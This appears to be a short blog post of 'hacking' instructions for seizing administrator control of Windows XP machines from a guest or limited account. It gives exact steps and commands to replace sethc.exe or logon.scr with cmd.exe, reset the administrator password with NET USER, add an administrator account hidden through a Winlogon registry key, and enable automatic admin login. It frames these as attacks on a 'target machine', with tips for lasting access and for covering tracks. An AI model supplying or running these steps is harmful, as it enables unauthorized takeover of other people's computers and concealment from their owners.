Method 1 (Change Admin Password)1.Go to C:/windows/system32
2.Copy cmd.exe and paste it on desktop
3.Rename cmd.exe to sethc.exe
4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.
5.Now Log out from your guest account and at the user select window,press shift key 5 times.
6.nstead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.
7.Now type “ NET USER ADMINISTRATOR aaa" where “aaa" can be any password you like and press enter.
8.You will see “ The Command completed successfully" and then exit the command prompt and login into
administrator with your new password.
Method 2 (Access admin without changing password)
Also, you can further create a new user at the command prompt by typing “NET USER How to hack /ADD" where " How to hack" is the username you would like to add with administrator privileges. Then hide your newly created admin account by -
Go to registry editor and navigate to this key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Here create a new " DWORD value", write its name as the “How to hack" (the username that you entered in the previous step),now you can live with your admin account forever.
Method 3:
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt without logging into XP.
Once this happens if you enter this command minus the quotes
"net user
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks
Automatic Administrator Login
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT :
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "AutoAdminLogon"="1"
No comments:
Post a Comment